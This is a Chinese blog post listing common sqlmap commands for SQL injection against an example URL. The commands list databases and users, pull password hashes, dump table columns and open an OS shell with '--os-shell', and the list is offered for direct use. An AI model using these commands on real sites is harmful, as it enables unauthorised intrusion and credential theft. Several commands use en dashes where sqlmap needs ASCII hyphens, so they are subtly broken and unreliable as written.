sqlmap常用命令

本文可直接wget得到,配合tmux使用体验更佳。(文章末尾)
./sqlmap.py –h     //查看帮助信息
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere”  //get注入
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” --data “DATA”//post注入
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” --dbs   //列数据库
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-users //列用户
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-passwords //获取密码hash
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-tables  -D DB_NAME //列DB_NAME的表
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME  //读取TB_NAME中的列
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据
 ./sqlmap.py –u “http://www.bigesec.com/inject.asp?id=injecthere” –-os-shell  //取得一个shell
https://bear962464.cn/2019/10/27/640/

2019 c clang css css3 kali linux nmap QQ QQ微信微博 termux termux命令 termux帮助 tmux使用帮助 Twenty Fifteen Twenty Twelve windows wordpress WordPress显示文章摘要 京东养红包 优化 作者权限 关于未来智能设备的思考 养红包 动态背景 厘米换算英尺英寸 喵币 小米手环2 小米手环4NFC 插件 然后是几点 特效 畅想智能设备 登录 社会化登录 答案 美化 蜘蛛网 逆序的三位数 透明

发布者

头像

Bearli

现在是过去最好的结果。

发表评论

电子邮件地址不会被公开。 必填项已用*标注